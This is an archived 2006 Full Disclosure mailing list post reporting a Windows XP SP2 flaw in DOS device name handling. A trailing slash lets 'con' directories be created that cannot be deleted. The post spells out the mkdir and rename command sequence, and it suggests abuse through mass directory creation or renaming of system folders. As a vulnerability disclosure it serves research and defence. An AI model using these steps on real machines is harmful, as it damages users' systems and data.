Full Disclosure mailing list archives
DOS device name handling
From: Klaudiusz Kulik <kulikk () monstrum org>
Date: Mon, 1 May 2006 18:06:22 +0200
Hi. * Overview: Valunerability exists in windows xp sp2 (others may also be affected), probably due to an error within the handling special device DOS names. In March 2000 Microsoft has patched similar problem in windows 98: http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6 * Environment: I tried this on polish windows xp sp2 with latest patches. Command outputs are translated into english, so they are not identical as in english version of xp. * Description: Using simple mkdir and rename commands it is possible to make directory structure which then can not be removed from disk without special, third party tools. Because even empty directory ocuppies some amount of disk space, this valunerability may be used against a user's machine by creating the millions of prepared, not eraseable directories. Other scenario may be renaming system or user's directory to invalid name. * Details: In a theory, windows does not allow programs to create directory containing special DOS device names (e.g. CON, LPT1, COM1, PRN). By simply adding a slash '/' character at the end of directory name, that protection fails. * Example: Assume we are on the root of drive C: Creating... mkdir "/foo/foo/foo/foo" Valid directory structure C:\foo\foo\foo\foo created. ... and renaming: cd \foo\foo\foo rename "foo" "con/" cd .. rename "foo" "con/" cd .. rename "foo" "con/" cd .. rename "foo" "con/" C:\ Now directory structure is: C:\con\con\con\con Please note that this is one way operation. Renaming from "con/" or "con" to "foo" does not work. However, if the directory has only one level (C:\con) and is empty or contains ,,normal'' entries, it is possible to remove it. Now, let's try browse: C:\cd "con" System nie może odnaleźć określonej ścieżki. [System can not find appropriate path.] C:\cd "con/" Nazwa katalogu jest nieprawidłowa. [Invalid directory name.] Let's try to rename: C:\rename "con" "foo" System nie może odnaleźć określonej ścieżki. [System can not find appropriate path.] C:\rename "con/" "foo" Nie można odnaleźć określonego pliku. [Could not find appropriate file.] And finally - removing: C:\>rmdir /S "con/" con/, Czy na pewno (T/N)? t [Are You sure (Y/N)?] con/\con\con\con\con - Nie można odnaleźć określonego pliku. con/\con\con\con - Nie można odnaleźć określonego pliku. con/\con\con - Nie można odnaleźć określonego pliku. con/\con - Nie można odnaleźć określonego pliku. [Could not find appropriate file.] Directory exists. C:\erase /S /Q "con" Nie można odnaleźć \\.\con. [Could not find \\.\con.] Please note a strange path. C:\erase /S /Q "con/" C:\ Directory *still* exists. Windows Explorer can browse directory, but renaming or removing fails. It looks like there is no simple way to remove C:\con from a disk. -- K. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- DOS device name handling Klaudiusz Kulik (May 01)
- Re: DOS device name handling 3APA3A (May 01)
- <Possible follow-ups>
- Re: DOS device name handling Klaudiusz Kulik (May 01)
- Re: Re: DOS device name handling Valdis . Kletnieks (May 01)